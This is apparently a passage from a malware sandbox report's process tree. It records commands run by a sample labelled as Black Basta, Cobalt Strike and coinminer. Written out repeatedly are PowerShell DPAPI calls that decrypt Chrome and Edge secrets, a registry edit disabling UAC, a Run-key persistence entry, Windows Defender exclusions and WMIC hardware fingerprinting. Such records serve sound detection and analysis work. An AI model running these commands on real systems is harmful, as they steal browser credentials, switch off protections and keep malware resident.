        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        
        PID:5616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:4504
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        
        PID:4404
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:4352
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:2108
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:5444
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:2448
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:5424
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        
        PID:5196
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.lC7tq7m92O""
      4⤵
      PID:2884
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.lC7tq7m92O"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4004
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:3632
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4984
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:1884
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:4976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:3896
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:884
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:4224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:4832
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:2524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:4840
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:5768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:1288
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:4580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:4600
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:5912
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:5096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:4048
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:5816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
PID:2016
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  PID:1568
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    PID:4724
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pxVSZECwKm.ps1""
      4⤵
      PID:1652
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pxVSZECwKm.ps1"
        5⤵
        
        PID:1228
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mlmfq0ev\mlmfq0ev.cmdline"
        6⤵
        
        PID:3516
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF0D8.tmp" "c:\Users\Admin\AppData\Local\Temp\mlmfq0ev\CSC27DD9336B58A48F2884C42694CDB1EC.TMP"
        7⤵
        
        PID:1964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:2616
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:5100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:5420
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        
        PID:3704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:2220
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:5508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:924
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        
        PID:2604
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:5784
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        
        PID:5428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:208
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:4868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:4956
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:3820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:2340
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        
        PID:816
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.F6Dylv2z0y""
      4⤵
      PID:2460
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.F6Dylv2z0y"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:4400
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:4356
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:4556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:5200
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:5580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:5036
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:5224
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:5004
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:1608
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:5676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:2136
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:4484
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:4432
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:4876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:5688
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:2164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:2108
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:3484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
PID:3096
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  PID:2268
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    PID:2448
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\hpcM1Dk7Kx.ps1""
      4⤵
      PID:2332
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\hpcM1Dk7Kx.ps1"
        5⤵
        
        PID:4516
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lyv5i5hd\lyv5i5hd.cmdline"
        6⤵
        
        PID:4480
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF9D1.tmp" "c:\Users\Admin\AppData\Local\Temp\lyv5i5hd\CSC31198E62C99449889658EA93F53F1A14.TMP"
        7⤵
        
        PID:1772
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:312
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:1108
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:3704
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:4564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:2948
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        
        PID:4036
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:924
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        
        PID:1876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:2132
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        
        PID:4868
  - - C:\Windows\system32\cmd.exe
